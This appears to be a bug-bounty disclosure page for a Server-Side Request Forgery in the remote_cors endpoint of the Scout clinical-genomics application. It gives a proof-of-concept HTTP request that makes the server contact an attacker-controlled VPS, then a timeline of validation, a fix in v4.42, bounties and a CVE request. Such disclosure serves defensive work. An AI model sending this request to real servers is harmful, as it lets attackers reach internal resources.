Server-Side Request Forgery in scout in clinical-genomics/scout

Valid

Reported on

May 3rd 2022

Description

Server-Side Request Forgery in remote_cors

Proof of Concept

GET /remote/cors/http://<my-vps>:8888 HTTP/1.1
Host: localhost:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://localhost:8000/cust000/cases
Cookie: <cookies>
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

PoC Image

image

Impact

An attacker could make the application perform arbitrary requests to fishing steal cookie, request to private area, or lead to xss...

We are processing your report and will contact the clinical-genomics/scout team within 24 hours. a year ago
Nhien.IT modified the report
a year ago
Nhien.IT modified the report
a year ago
Nhien.IT modified the report
a year ago
We have contacted a member of the clinical-genomics/scout team and are waiting to hear back a year ago
Chiara Rasi validated this vulnerability a year ago
Nhien.IT has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Chiara Rasi marked this as fixed in v4.42 with commit b0ef15 a year ago
Chiara Rasi has been awarded the fix bounty
This vulnerability will not receive a CVE
Nhien.IT
a year ago

Researcher

Hi @maintainer, the fix is already released, can you assign a CVE here? if you can, hope @admin help

Jamie Slome
a year ago

Admin

Sorted 👍

to join this conversation